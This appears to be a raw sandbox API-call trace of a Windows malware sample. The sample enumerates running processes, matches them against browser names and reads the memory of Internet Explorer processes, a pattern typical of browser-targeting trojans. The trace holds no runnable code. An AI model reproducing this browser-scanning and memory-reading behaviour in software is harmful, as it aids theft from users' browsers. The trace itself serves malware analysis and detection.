	[0206.831] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0206.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.832] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0206.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3098
	[0206.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.833] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0206.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.833] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.833] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0206.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.834] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.834] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0206.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x309c
	[0206.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.835] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.835] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.835] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.836] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.836] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0206.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x30a0
	[0206.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.836] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0206.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.837] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.837] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0206.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.838] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0206.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0206.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0206.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x30a4
	[0206.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.839] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0206.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.840] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.840] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0206.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.841] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.842] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0206.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x30a8
	[0206.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.842] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0206.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.843] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.843] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0206.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.843] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.843] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0206.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x30ac
	[0206.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.844] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0206.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.845] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.845] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0206.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.845] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.845] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0206.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x30b0
	[0206.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.846] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0206.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.847] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.847] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0206.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.847] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0206.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x30b4
	[0206.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.848] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0206.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.849] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.850] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0206.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.850] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0206.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x30b8
	[0206.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.851] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0206.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.852] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.852] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0206.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.852] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0206.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x30bc
	[0206.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.853] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0206.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.854] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.854] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0206.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.855] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.855] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0206.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x30c0
	[0206.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.856] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0206.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.856] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.857] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0206.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.857] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0206.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x30c4
	[0206.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.858] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0206.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.859] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.859] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0206.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.859] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0206.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x30c8
	[0206.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.860] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0206.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.861] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.861] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0206.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.861] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.861] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0206.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x30cc
	[0206.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.862] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0206.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.863] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.863] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0206.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.863] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0206.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x30d0
	[0206.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.865] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0206.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.865] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.866] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0206.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.866] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0206.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x30d4
	[0206.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.868] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0206.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.868] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.869] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0206.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.869] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0206.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x30d8
	[0206.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.870] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0206.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.871] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.872] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0206.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.872] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.873] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0206.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x30dc
	[0206.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.874] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0206.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.874] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.875] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0206.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.875] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x30e0
	[0206.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.876] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.877] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.877] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.877] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.878] NtQueryInformationProcess (in: ProcessHandle=0x30e0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.878] ReadProcessMemory (in: hProcess=0x30e0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.878] ReadProcessMemory (in: hProcess=0x30e0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.878] ReadProcessMemory (in: hProcess=0x30e0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.878] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x30e4
	[0206.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.879] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.879] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.879] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.880] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.880] NtQueryInformationProcess (in: ProcessHandle=0x30e4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.880] ReadProcessMemory (in: hProcess=0x30e4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.880] ReadProcessMemory (in: hProcess=0x30e4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.880] ReadProcessMemory (in: hProcess=0x30e4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.880] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x30e8
	[0206.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.881] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.882] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.882] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.882] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0206.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x30ec
	[0206.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.883] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0206.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.884] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.884] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0206.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.884] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
